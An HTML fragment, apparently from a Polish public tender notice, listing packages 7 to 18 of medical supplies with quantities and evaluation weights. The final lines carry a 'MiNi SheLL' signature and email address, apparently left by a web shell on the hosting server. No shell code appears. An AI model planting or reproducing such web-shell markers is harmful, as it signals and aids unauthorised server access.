<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Jakość - 20</li>
<li>3. Koszt kredytowania - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pakiet nr 7.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są:
Kompres z alginianem wapnia 10 cm x 10 cm szt.	250
Kompres z alginianem wapnia 5 cm x 5 cm szt.	50
Opatrunek przeźroczysty samoprzylepny z warstwą chłonną 9cm x 15 cm	5
Opatrunek do aktywnego oczyszczania ran zakażonych, obustronnie aktywny do 12 godz. 7,5cmx7,5 cm szt.	50
Opatrunek do aktywnego oczyszczania ran zakażonych, jednostronnie aktywny do 24 godz. 7,5cmx7,5 cm szt.	100
Opatr. hydrokoloidowy do wilgotnego opatrywania ran 10 cm x 10 cm szt.	400
Opatr. hydrokoloidowy do wilgotnego opatrywania ran 15 cm x 15 cm szt.	10
Opatr. przeźroczysty żelowy z folią mocującą 10 cm x 7,5-10 cm szt.	10
Opatr. przeźroczysty żelowy z folią mocującą 12,5 cm x 12,5 cm szt.	10
Opatr. przeźroczysty, jałowy, samoprzylepny do osłonięcia ran 10 cm x 14-15 cm szt.	1 500
Opatrunek siatkowy z maścią do opatrywania ran 5 x 5	400
Opatrunek siatkowy z maścią do opatrywania ran 10 x 10	400
Antybakteryjny jałowy opatrunek z maścią neutralną zawierający 
srebro metaliczne 5 x 5 cm szt.	20
Antybakteryjny jałowy opatrunek z maścią neutralną zawierający 
srebro metaliczne 10 x 10 cm szt.	450
Antybakteryjny jałowy opatrunek z maścią neutralną zawierający 
srebro metaliczne 10 x 20 cm szt.	100
Jałowy opatrunek siatkowy impregnowany cząsteczkami hydrokoloidowymi i neutralną maścią 5x5 cm szt.	10
Jałowy opatrunek siatkowy impregnowany cząsteczkami hydrokoloidowymi i neutralną maścią 10x12 cm szt.	10
Jałowy opatrunek siatkowy impregnowany cząsteczkami hydrokoloidowymi i neutralną maścią 15x20 cm szt.	10
Opatr. przeźroczysty, jałowy, samoprzylepny do osłonięcia ran 6 cm x 9-10 cm szt.	50
Hydrożelowy żel amorficzny a 15g szt.	150
Jałowy, samoprzylepny hydropolimerowy opatrunek piankowy 11cmx11cm szt.	10
Jałowy, samoprzylepny hydropolimerowy opatrunek piankowy 15cmx15cm szt.	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Jakość - 20</li>
<li>3. Koszt kredytowania - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pakiet nr 8.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są:
Opatrunek bakteriobójczy nasączony rozpuszczalnym żelem jodoforowym 5x5 cm a 25 szt.	25
Opatrunek bakteriobójczy nasączony rozpuszczalnym żelem jodoforowym 9,5x9,5 cm a 25 szt.	20
Opatrunek z węglem aktywowanym srebrem aktywnym na MRSA 10,5x10,5cm a 10 szt.	5
Opatrunek jałowy hydrokoloidowy 10x10 cm 	200
Opatrunek jałowy hydrokoloidowy 15x15 cm 	50
Opatrunek kolagenowy 10x10cm	5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Jakość - 20</li>
<li>3. Koszt kredytowania - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Pakiet nr 9.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są:
Pieluchomajtki dla dorosłych S o chłonności min. 1550 ml	800
Pieluchomajtki dla dorosłych M szt. o chłonności min. 2250 ml	9 000
Pieluchomajtki dla dorosłych L  o chłonności min. 2450ml.	65 000
Pieluchomajtki dla dorosłych XL o chłonności min 2550ml.	2 000
Wkładki anatomiczne normal szt.	600
Wkładki anatomiczne extra szt.	600
Podkłady chłonne ok.. 90x60 szt.+/- 3 cm, o chłonności min. 900 ml	7 200
Pieluchomajtki dla dorosłych S o chłonności min. 2550 ml	300
Pieluchomajtki dla dorosłych M o chłonności min. 2950 ml	300
Pieluchomajtki dla dorosłych L o  chłonności min. 3300 ml	300
Pieluchomajtki dla dorosłych XL o chłonności min. 3350ml	300.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Jakość - 20</li>
<li>3. Koszt kredytowania - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Pakiet nr 10.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są:
Pieluchomajtki dla noworodków 2 kg-4-5 kg z wycięciem na pępowinę (bezlatexowe) szt.	50000
Pieluchomajtki dla dzieci 3 kg-6 kg ( bezlatexowe) szt	3000
Pieluchomajtki dla dzieci 11-12 kg-25 kg (bezlatexowe) szt.	1000
pieluchomajtki dla dzieci 7-9 kg-18 kg (bezlatexowe) szt.	8000
Pieluchomajtki dla dzieci 4-5 kg- 9 kg (bezlatexowe) szt.	6000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Jakość - 20</li>
<li>3. Koszt kredytowania - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Pakiet nr 11.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są:
Lignina bielona arkusze kg	1 800
Lignina rolki a 150 g szt. 	100
Wata opatrunkowa bawełniano-wiskozowa a 200 g szt.	1 000
Wata opatrunkowa bawełniano-wiskozowa a 500 g szt.	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Jakość - 20</li>
<li>3. Koszt kredytowania - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Pakiet nr 12.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są:
Kompresy gazowe wyjałowione 8W 17N 5cm x 5cm x 3szt., op.	4 000
Kompresy gazowe wyjałowione 8W 17N 5cm x 5cm x 5szt., op.	50 000
Kompresy gazowe wyjałowione 8W 17N 5cm x 5cm x 10szt., op.	6 000
Kompresy gazowe wyjałowione 8W 17N 7,5cm x 7,5cm x 3szt., op.	2 000
Kompresy gazowe wyjałowione 8W 17N 7,5cm x 7,5cm x 5szt., op.	48 000
Kompresy gazowe wyjałowione 8W 17N 7,5cm x 7,5cm x 10szt., op.	7 000
Kompresy gazowe wyjałowione 8W 17N 10cm x 10cm x 3szt., op.	2 500
Kompresy gazowe wyjałowione 8W 17N 10cm x 10cm x 5szt., op.	42 000
Kompresy gazowe wyjałowione 8W 17N 10cm x 10cm x 10szt., op.	10 000
Kompresy gazowe wyjałowione 8W 17N 10cm x 10cm x 20szt., op.	2 800
Kompresy gazowe wyjałowione 8W 17N 10cm x 10cm x 40szt., op.	1 200
Kompresy gazowe wyjałowione 8W 17N 5cm x 5cm x 20szt., op.	100
Kompresy gazowe wyjałowione 8W 17N 7,5cm x7, 5cm x 20szt., op.	100
Kompresy gazowe wyjałowione RTG 12W 17N 5cm x 5cm x 10szt., op.	100
Kompresy gazowe wyjałowione RTG 12W 17N 7,5cm x 7,5cm x 10szt., op.	400
Kompresy gazowe wyjałowione RTG 12W 17N 10cm x 10cm x 20szt., op.	1 200
Kompresy gazowe wyjałowione RTG 12W 17N 10cm x 10cm x 40szt., op.	1 000
Serweta operacyjna wyjałowiona z RTG i tasiemką 4W 17-20N, 45 cmx 45cm x 2szt., op.	4 500
Serweta operacyjna wyjałowiona z RTG i tasiemką 4W 17-20N, 45 cmx 70cm x 3szt., op.	500
Tupfery wyjałowione z gazy 20-nitkowej z RTG w kształcie kuli ok. 20x20 cm x 10szt., op.	100
Tupfery wyjałowione z gazy 20-nitkowej z RTG w kształcie kuli ok. 24x24 cm x 10szt., op.	100
Tupfery wyjałowione z gazy 24-nitkowej z RTG w kształcie fasoli ok. 12x12 cm x 10szt., op.	1 500
Gaza wyjałowiona 1/2m x 1m,17N, szt.	8 000
Gaza wyjałowiona 1m x 1m,17N, szt.	15 000
Kompresy włókninowe 30-40G 6W z nacięciem Y 10x10 cm a2 szt.	1 000
Kompresy włókninowe 30-40G 6W z nacięciem Y 7,5x7,5 cm a2 szt.	1 000
Gaza niejałowa  0,9 mx100m op. 17 nitkowa	30
Kompresy gazowe niejałowe 10 cm x 10 cm x 100 8W 17 nitkowe 	100
Kompresy gazowe niejałowe 5 cm x 5 cm x 100 8W 17 nitkowe	6 000
Kompresy gazowe niejałowe 7,5 cm x 7,5 cm x 100 8W 17 nitkowe 	100
Serweta operacyjna 45 cm x 45 cm z elementem RTG i tasiemką 20N, 4W, szt.	500
Kompresy gazowe niejałowe 10 cm x 10 cm x 100 + nitka RTG  12W 17 nitkowe	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Jakość - 20</li>
<li>3. Koszt kredytowania - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Pakiet nr 13.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są:
Seton jałowy 17N 4W 2m x 5cm	500
Opaska elasyczna jałowa 5m x 15cm	1 000
Opaska dziana jałowa 4m x 15cm	1 000
Serwetka jałowa w rozm. 80x60 a 2 szt	1 000
Podkłady ginekologiczne jałowe 34x9 cm a10 szt.	2 000
Jałowy zestaw do rozpoczęcia dializy zapakowany w opakowanie typu blister                                                       Skład zestawu:
Serwetka włókninowa 45cm x 40cm - 1 szt, Rękawiczki lateksowe rozm. S - 2 szt, Kompresy włókninowe 4W 40gm2 7,5cm x 7,5cm - 4szt, Samoprzylepny opatunek do mocowania kaniul z włókniny z wkładem chłonnym 8cm x 5,8cm - 1 szt, Przylepiec włókninowy 2,5cm x 15cm - 2 szt,
Możliwość zamawiania zestawów z rękawiczką w rozmiarze S lub M	8000
Jałowy zestaw do zakończenia dializy zapakowany w opakowanie typu blister                                                       Skład zestawu:
Rękawiczki lateksowe rozm. S - 2 szt, Rękawiczka lateksowa rozm. L - 1 szt, Kompresy włókninowe 4W 40gm2 7,5cm x 7,5cm - 4szt, Opatrunek Pushban 38mm x 72mm - 2 szt,
 Możliwość zamawiania zestawów z rękawiczką w rozmiarze S lub M	8000
Jałowy zestaw do zmiany opatrunku zapakowany w opakowanie 3 komorowe typu twardy blister, na opakowaniu centralna etykieta z dwiema nalepkami  z numerem serii, datą ważności, identyfikacją producenta, służąca do wklejania do dokumentacji. Sterylizacja tlenkiem etylenu                                                            Skład zestawu:
Kompres włókninowy 30g 4W, 7,5cm x 7,5cm - 2 szt Tupfer typu kula 20x20cm - 6 szt
Penseta plastikowa - 2 szt (każda w innym kolorze)	50
Jałowy zestaw do zmiany opatrunku rozbudowany  zapakowany w opakowanie 3 komorowe typu twardy blister, na opakowaniu centralna etykieta z dwiema nalepkami  z numerem serii, datą ważności, identyfikacją producenta, służąca do wklejania do dokumentacji. Sterylizacja tlenkiem etylenu                                                            Skład zestawu:
Kompres włókninowy 30g 4W 7,5cm x 7,5cm - 2 szt Tupfer typu kula 20x20cm - 6 szt
Penseta plastikowa - 2 szt (każda w innym kolorze) Ostrze chirurgiczne nr 11 - 1 szt
Rękawiczki lateksowe bezpudrowe M - 2 szt,                                 Worek foliowy na odpady 24x27cm - 1 szt	50
Jałowy zestaw do usuwania szwów zapakowany w opakowanie 3 komorowe typu twardy blister, na opakowaniu centralna etykieta z dwiema nalepkami  z numerem serii, datą ważności, identyfikacją producenta, służąca do wklejania do dokumentacji. Sterylizacja tlenkiem etylenu                                                            Skład zestawu:
Tupfer typu kula 20x20cm - 6 szt
Pęseta plastikowa - 1 szt                                             Nożyk typu Stich Cutter - 1 szt
Rękawiczki lateksowe bezpudrowe M - 2 szt, 	50
Jałowy zestaw do wkłucia lędźwiowego zapakowany w 3 komorowe opakowanie typu twardy blister, na opakowaniu centralna etykieta z dwiema nalepkami  z numerem serii, datą ważności, identyfikacją producenta, służąca do wklejania do dokumentacji. Sterylizacja tlenkiem etylenu                                                               Skład zestawu:                                                                Serweta min. 2 warstwowa w rozmiarze 75x45cm - 1 szt  Serweta min. 2 warstwowa włókninowo-foliowa min. 56gm2 w romiarze 50x60cm z otworem 10cm - 1 szt                                Kompres włókninowy 4W 7,5x7,5cm - 10 szt                       Strzykawka 5 ml - 1 szt                                         Strzykawka 3 ml - 1 szt                                                     Igła 12 - 1 szt                                                                                    Igła 5 - 1 szt                                                                       Opatrunek zabezpieczający miejsce wkłócia w rozmiarze 5x7,2cm - 1 szt  Penseta plastikowa - 1 szt,	50
Jałowy zestaw do wkłucia centralnego zapakowany w 2 komorowe opakowanie typu twardy blister, na opakowaniu centralna etykieta z dwiema nalepkami  z numerem serii, datą ważności, identyfikacją producenta, służąca do wklejania do dokumentacji. Sterylizacja tlenkiem etylenu                                                               Skład zestawu:                                                                Serweta min. 2 warstwowa w rozmiarze 75x45cm - 1 szt  Serweta min. 2 warstwowa włókninowo-foliowa min. 56gm2 w romiarze 45x75cm z otworem 8cm i przylepcem wokół otworu - 1 szt                                                Kompres gazowy 17N 8W 7,5x7,5cm - 10 szt             Tupfer typu kula 20x20cm - 10 szt                         Penseta plastikowa - 1szt                                      Strzykawka 20 ml - 1 szt                                         Strzykawka 10 ml - 1 szt    Ostrze chirurgiczne nr 11 - 1 szt                                                                                                                                                                    Imadło metalowe  - 1 szt                                                  Igła 1,2 - 1 szt                                                                                    Igła 0,8 - 1 szt                                                                                                                                                                                                     	50
Jałowy zestaw do podłączenia kroplówki zapakowany w torebkę papierowo - foliową, na opakowaniu centralna etykieta z dwiema nalepkami  z numerem serii, datą ważności, nazwą producenta, służąca do wklejania do dokumentacji. Sterylizacja tlenkiem etylenu                           Skład zestawu:
Kompres włókninowy 40g 4W, 7,5cm x 7,5cm - 4szt
Rękawiczki lateksowe M - 2 szt                               Opatrunek do mocowania kaniuli 8x5,8cm - 1 szt      Przyrząd do przetaczania płynów - 1 szt	50
Jałowy zestaw do cewnikowania zapakowany w opakowanie typu twardy blister, na opakowaniu centralna etykieta z dwiema nalepkami  z numerem serii, datą ważności, identyfikacją producenta, służąca do wklejania do dokumentacji.                                                            Skład zestawu:                                                           Serwetka min. 2 warstwowa w rozmiarze 50x60cm - 1 szt                                 Serwetka min. 2 warstwowa w rozmiarze 50x60cm z otworem 5cm i rozcięciem- 1 szt                                                 Rękawiczni nitrylowe M - 2 szt                                  Tupfer typu kula 17 nitkowy 20x20cm - 5szt         Kompres gazowy 17N 8W, 7,5cm x 7,5cm - 8 szt      Penseta plastikowa - 1 szt                                               Pean plastikowy min.14cm - 1 szt                                   Pojemnik plastikowy 120 ml - 1 szt                                            Strzykawka wypełniona jalową wodą z 10% gliceryną - 1 szt                                                                            Strzykawka wypełniona lubrykantem - 1 szt    	50
Zestaw do cewnikowania zawierający: serwetę z laminatu ,50x60 cm- 1szt., rękawice lateksowe z wywiniętymi mankietami - 2 szt., serweta z laminatu  50x60 cm z otworem 5 cm i rzcięciem 1 szt, tupfer kula z gazy 17 nitkowej 20x20 cm -6 szt, pojemnik plastikowy , okragły 120 ml- 1 szt, penseta plastikowa -1 szt, cenik Foley - 1 szt ( możliwośc zamówienia rozmiarów 16 lub 18 lub 20 lub 22), worek na mocz z zaworem2 l- 1 szt, strzykawka 10 ml- 1 szt, igła 12mm-1 szt, zestaw zapakowany w opakowanie typu twardy blister jednokomorowy, na opakowaniu centralna etykieta z dwiema nalepkami z numerem serii, datą ważności, identyfikacją producenta , służąca do wklejnia do dokumentacji, sterylizowany tlenkiem etylenu	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-0.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Jakość - 20</li>
<li>3. Koszt kredytowania - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Pakiet nr 14.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są:
Sterylny opatrunek hydrożelowy , schładzający  10x10 cm	10
Sterylny opatrunek hydrożelowy , schładzający  5x15 cm	10
Sterylny opatrunek hydrożelowy , schładzający  10x40 cm	10
Sterylny opatrunek pooparzeniowy 20x20 cm	20
Sterylny opatrunek hydrożelowy , schładzający 20x45-46 cm	25
Sterylny opatrunek pooparzeniowy 60x40 cm	10
Sterylny opatrunek pooparzeniowy na twarz 20x45 cm	10
Sterylny opatrunek hydrożelowy , schładzający  twarz, 30x40 cm	10
Sterylny opatrunek hydrożelowy , schładzający  , dłoń 20x50 cm	5
Koc poopażeniowy 100x100 cm	2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Jakość - 20</li>
<li>3. Koszt kredytowania - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Pakiet nr 15.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są:
Chusteczki nasaczone pielęgnacyjne a 68 szt	30
Pianka myjąco - pielęgnująca . Pojemność 500 ml. 	50
Krem myjący 3w1 do całego ciała z biokompleksem lnianym. Pojemność 950 ml. 	50
Krem do suchej, zrogowaciałej skóry, 10% UREA. Pojemność 100 ml. 	40
Krem ochronny z tlenkiem cynku. Pojemność 200 ml. 	40
Krem ochronny z argininą. Pojemność 200 ml. 	40.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Jakość - 20</li>
<li>3. Koszt kredytowania - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Pakiet nr 16.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są:
Pieluchomajtki dla dorosłych z problemem nietrzymania moczu i stolca o zdolności przepuszczania powietrza rozmiar XS o chłonności min. 1350 ml	1000
Pieluchomajtki dla dorosłych z problemem nietrzymania moczu i stolca o zdolności przepuszczania powietrza rozmiar S o chłonności min. 1550 ml	3500
Pieluchomajtki dla dorosłych z problemem nietrzymania moczu i stolca o zdolności przepuszczania powietrza  rozmiar M o chłonności min. 2250 ml	32000
Pieluchomajtki dla dorosłych z problemem nietrzymania moczu i stolca o zdolności przepuszczania powietrza  rozmiar L o chłonności min. 2550 ml	52000
Pieluchomajtki dla dorosłych z problemem nietrzymania moczu i stolca o zdolności przepuszczania powietrza  rozmiar XL o chłonności min. 2550ml 	4500
Pieluchomajtki dla dorosłych z problemem nietrzymania moczu i stolca o zdolności przepuszczania powietrza o podwyższonej chłonności (nocne) rozmiar S o chłonności min. 2050 ml	1500
Pieluchomajtki dla dorosłych z problemem nietrzymania moczu i stolca o zdolności przepuszczania powietrza o podwyższonej chłonności (nocne) rozmiar M o chłonności min. 2850ml	20000
Pieluchomajtki dla dorosłych z problemem nietrzymania moczu i stolca o zdolności przepuszczania powietrza o podwyższonej chłonności (nocne) rozmiar L o chłonności min. 3150 ml	34000
Pieluchomajtki dla dorosłych z problemem nietrzymania moczu i stolca o zdolności przepuszczania powietrza o podwyższonej chłonności (nocne) rozmiar XL o chłonności min. 3150 ml	4500
Pieluchomajtki o najwyższej chlonności (z podwójnym wkładem chlonnym) rozmiar M o chłonności min. 2950ml	1200
Pieluchomajtki o najwyższej chlonności (z podwójnym wkładem chlonnym) rozmiar L o chłonności min. 3300 ml	1200
Podkłady chłonne 90 cm x 60 cm +/- 3 cm o chłonności min. 900 ml	4800
Podkłady bardzo chłonne 90 cm x 60 cm +/- 3 cm o chłonności min. 1700 ml	2500
Anatomiczne wkładki urologiczne dla kobiet typu M	3500
Anatomiczne wkładki urologiczne dla kobiet typu L	3500
Anatomiczne wkładki urologiczne dla kobiet typu XL	3500
Anatomiczne wkładki urologiczne dla kobiet typu XXL	3500
Majtki chłonne   , zakładane i zdejmowane jako zwykła bielizna , rozrywane szwy boczne, podwójny wkład chłonnyrozmiar M, o chłonności min. 1100 ml	600
Majtki chłonne   , zakładane i zdejmowane jako zwykła bielizna, rozrywane szwy boczne, podwójny wkład chłonny rozmiar L , o chłonności min. 1100 ml	1200
Majtki chłonne  , zakładane i zdejmowane jako zwykła bielizna,rozrywane szwy boczne, podwójny wkład chłonny,  rozmiar XL, o chłonności min. 1100 ml	900
Majtki chłonne  o podwyższonej chłonności  min. 1400 ml, zakładane i zdejmowane jako zwykła bielizna ,rozrywane szwy boczne, podwójny wkład chłonny,rozmiar M 	1200
Majtki chłonne o  podwyższonej chłonności  min. 1500 ml, zakładane i zdejmowane jako zwykła bielizna, rozrywane szwy boczne, podwójny wkład chłonny, rozmiar L 	900
Majtki chłonne  o podwyższonej chłonności min. 1600 ml, zakładane i zdejmowane jako zwykła bielizna ,rozrywane szwy boczne, podwójny wkład chłonny,rozmiar XL 	1200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Jakość - 20</li>
<li>3. Koszt kredytowania - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Pakiet nr 17.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są:
Gąbka hemostatyczna specjal 70 x 50 x 1 mm x 20 	80
Gąbka hemostatyczna standard 70 x 50 x 10 mm x 20 	120.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Jakość - 20</li>
<li>3. Koszt kredytowania - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Pakiet nr 18.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są:
Niesterylny, przeźroczysty opatrunek na rolce, nie zawierający latexu, wykonany na podłożu z folii poliuretanowej z hipoalergicznym klejem akrylowym o wymiarach 10cm x 10m	30
Plaster przeźroczysty (polietylen), perforowany, umożliwający łatwe dzielenie wzdłuż i w poprzek bez użycia nożyczek, z hipoalergicznym klejem akrylowym. O wymiarach 7,5cm x 9,14m (1op.=4rolki)	8
Hypoalergiczna, przeźroczysta folia do zabezpieczania kaniul centralnych z hipoalergicznym klejem akrylowym, wyposażona w metkę do oznaczania oraz ramkę zapewniającą aplikację strylną, o wymiarach 10x12 cm op. a` 50 szt.	30
Hypoalergiczna, biała włóknina do zabezpieczania kaniul dożylnych z hipoalergicznym klejem akrylowym, o wymiarach 76mm x 51mm x 50 szt.	200
Bandaż do leczenia obrzęków i drenażu limfatyczno-żylnego, powodujący zróżnicowaną stymulację i ruchliwość tkanek 10cmx3m o wielkości bloczków 15mmx15mm	20
Hypoalergiczna, przeźroczysta folia do zabezpieczania kaniul dożylnych u noworodków z hipoalergicznym klejem akrylowym, wyposażona w ramkę zapewniającą aplikację strylną, oraz dwa niezależne przylepne paski z włókniny, służące do wzmocienia miejsca wkłócia, o wymiarach 5x5,7cm.	1 000
Przeźroczysty, sterylny opatrunek do mocowania i zabezpieczania wkłuć naczyniowych z wcięciem na port pionowy (zawiera metkę do oznaczania oraz ramkę zapewniającą aplikację strylną). Wykonany na podłożu z foli poliuretanowej z hipoalergicznym klejem akrylowym, o wymiarach 6x7cm	20 000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Jakość - 20</li>
<li>3. Koszt kredytowania - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com